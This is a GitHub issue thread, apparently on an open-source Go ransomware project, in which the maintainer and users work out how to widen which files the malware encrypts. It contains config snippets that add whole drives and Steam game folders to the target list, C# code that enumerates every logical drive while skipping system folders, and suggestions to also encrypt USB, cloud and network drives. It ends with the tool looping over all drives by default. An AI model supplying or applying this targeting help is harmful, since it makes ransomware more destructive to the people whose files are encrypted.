
Comments (22)

mauri870 avatar mauri870 commented on September 12, 2024

1 - I will investigate this behavior

2- The unlocker is compiled with the malware so both share the same cmd variables, including the InterestingDirs, so an unlocker will be useful only with the respective encrypter

from ransomware.

justuandme avatar justuandme commented on September 12, 2024

This is a request for a feature that can also search directories and files in other drives like E, F, Z etc. and encrypt them. Rather than providing the full path of the folders, can it be used to search for the file extensions in other Windows drives?
2- Also search and encrypt/decrypt file extensions in other available drives.


mauri870 avatar mauri870 commented on September 12, 2024

I didn't test it, but I think you can specify custom drives directly in the InterestingDirs variable. Internally I use filepath.Walk to match files in dirs and subdirs.


justuandme avatar justuandme commented on September 12, 2024

When EDrive = fmt.Sprintf("E:\\newfolder")
this will do the job in the E drive newfolder only, but I want it to do the job on the whole E:\ drive without providing any folder name.
If I do EDrive = fmt.Sprintf("E:\\") it doesn't work.
Is there any way to do the job on a whole drive without providing folder names?


mauri870 avatar mauri870 commented on September 12, 2024

From the filepath.Walk documentation

func Walk(root string, walkFn WalkFunc) error
Walk walks the file tree rooted at root, calling walkFn for each file or directory in the tree, including root. All errors that arise visiting files and directories are filtered by walkFn. The files are walked in lexical order, which makes the output deterministic but means that for very large directories Walk can be inefficient. Walk does not follow symbolic links.

It's supposed to work 😕


mauri870 avatar mauri870 commented on September 12, 2024

@justuandme Try this:

// Directories to walk searching for files
InterestingDirs = []string{
    UserDir + "Pictures",
    UserDir + "Documents",
    UserDir + "Music",
    UserDir + "Desktop",
    UserDir + "Downloads",
    UserDir + "Videos",
    "E:\\",
}


justuandme avatar justuandme commented on September 12, 2024

Great, this works now! 👯‍♂️


justuandme avatar justuandme commented on September 12, 2024

Now it's not working on the same VM after I reverted and ran the same ransom binary.
It shows this error.

2016/10/14 11:04:31 rename C:\Users\Test\AppData\Local\Temp\263942.jpg E:\fdasdfsafaffasgjsjd\263942.jpg: The system cannot move the file to a different disk drive.

But the files are there at their paths.


mauri870 avatar mauri870 commented on September 12, 2024

This error is supposed to be thrown on unix systems only 😕
But I think this is related here

I will fix this as soon as possible

Thanks for your reports


 avatar commented on September 12, 2024

Hello,

Please check this : Loop through files and folders recursively

https://gist.github.com/francoishill/a5aca2a7bd598ef5b563

and get it combined with something like :
C#

foreach (string drive in Directory.GetLogicalDrives())

{

//call to Loop through files and folders recursively , and add found files to List ( list can be filtered for specific extensions like the code below.

}

Also, I think it is better to add a filter with blacklisted directories which we do not need, like Windows, Program Files, Recovery ... etc.

In C# I do it like this:

        static List<string> blacklist = new List<string>()
            {
                 "$Recycle.Bin", "Documents and Settings", "Program Files", "Program Files (x86)", "ProgramData", "Recovery"
            };

................


IEnumerator<DirectoryInfo> dirs;
            try
            {
                dirs = top_directory.EnumerateDirectories("*").Where(d =>
                !d.Name.Contains(blacklist[0]) &&
                !d.Name.Contains(blacklist[1]) &&
                !d.Name.Contains(blacklist[2]) &&
                !d.Name.Contains(blacklist[3]) &&
                !d.Name.Contains(blacklist[4]) &&
                !d.Name.Contains(blacklist[5])).GetEnumerator();
            }

I'm more into C#, hope this helps


justuandme avatar justuandme commented on September 12, 2024

Hello,
I'm not good at Golang or C#... let mauri find it.
But I think we don't need to restrict or define folder names in the C drive; instead,
mauri already provided some C drive paths where to encrypt.
Btw I think we don't restrict some programs in "Program Files";
encrypt some Steam games too xD

SteamEncrypt = fmt.Sprintf("C:\\$ProgramFilesDir")

// Directories to walk searching for files
    InterestingDirs = []string{
        UserDir + "Pictures",
        UserDir + "Documents",
        UserDir + "Music",
        UserDir + "Desktop",
        UserDir + "Downloads",
        UserDir + "Videos",
        SteamEncrypt + "\\Steam\\steamapps\\common",
    }

Add exe in extensions

    // Interesting extensions to match files
    InterestingExtensions = []string{
        // Text Files
        "doc", "docx", "msg", "odt", "wpd", "wps", "txt",
        ...........................................
        // SteamEncrypt & UserProfile Paths any exe encrypt.
        "exe"
}

Moreover, you can encrypt all files stored on USB drives/sticks, external disks, internal disks, OneDrive, Dropbox, Google Drive, network drives, network shares.


 avatar commented on September 12, 2024

@justuandme Steam games and saves are not saved as .exe in the programs folder; encrypting the game.exe or steam.exe is useless.

The C# code I wrote above scans all drives, not only C. Also, it is a bad idea to use a hard-coded value C as you mentioned above in "SteamEncrypt"; what if the OS is not installed on the C drive? 😉


justuandme avatar justuandme commented on September 12, 2024

@hanoosh
The hard-coded value is just an example, not the correct code. If you see my previous post above, I asked for something that starts a loop and scans all the drives A-Z and then starts encrypting.

Whatever extension Steam games use, we can add that extension. I'm making a list of a huge number of extensions, will check what the Steam game extensions are and will post it here soon.


mauri870 avatar mauri870 commented on September 12, 2024

Hi guys, sorry for the delay

About this error:

2016/10/14 11:04:31 rename C:\Users\Test\AppData\Local\Temp\263942.jpg E:\fdasdfsafaffasgjsjd\263942.jpg: The system cannot move the file to a different disk drive.

The temporary file is created in AppData\Local\Temp on the system drive (C in most cases). For performance reasons I use os.Rename to copy the temp file to the original file, but on Windows we cannot rename a file across drives 😞

I think I'll have to open the two files and copy them via stream (io.Copy)


mauri870 avatar mauri870 commented on September 12, 2024

@justuandme Feel free to fork and add more extensions to match ;)


justuandme avatar justuandme commented on September 12, 2024

@mauri870 Any changes so far? Did you check with all drives?


mauri870 avatar mauri870 commented on September 12, 2024

Hi @justuandme. This error:

2016/10/14 11:04:31 rename C:\Users\Test\AppData\Local\Temp\263942.jpg E:\fdasdfsafaffasgjsjd\263942.jpg: The system cannot move the file to a different disk drive.

is fixed here

About scanning drives, it's not implemented yet because there are multiple folders that we need to ignore, otherwise it will cause system instability and crashes.

For now you can specify drives manually


justuandme avatar justuandme commented on September 12, 2024

I specified the drive letter manually... I specified all letters from A-Z but it crashes on scanning the valid one.
Is there any way to find the total number of drives and scan those for files?


mauri870 avatar mauri870 commented on September 12, 2024

@justuandme You can use this examples


justuandme avatar justuandme commented on September 12, 2024

@mauri870 I have used this example before, but it didn't work for me.
I'm not a Go pro :( Can you merge it or show me how to implement it?


mauri870 avatar mauri870 commented on September 12, 2024

Hi @justuandme, sorry for the delay. I will add options to exclude dirs in the future.

About identifying the available drives, it's more complicated because we need to load kernel32.dll; this will add more stuff to the project rather than the current simple string slice. I will think more about this.


mauri870 avatar mauri870 commented on September 12, 2024

I'll close this issue since now we can loop all available drives by default

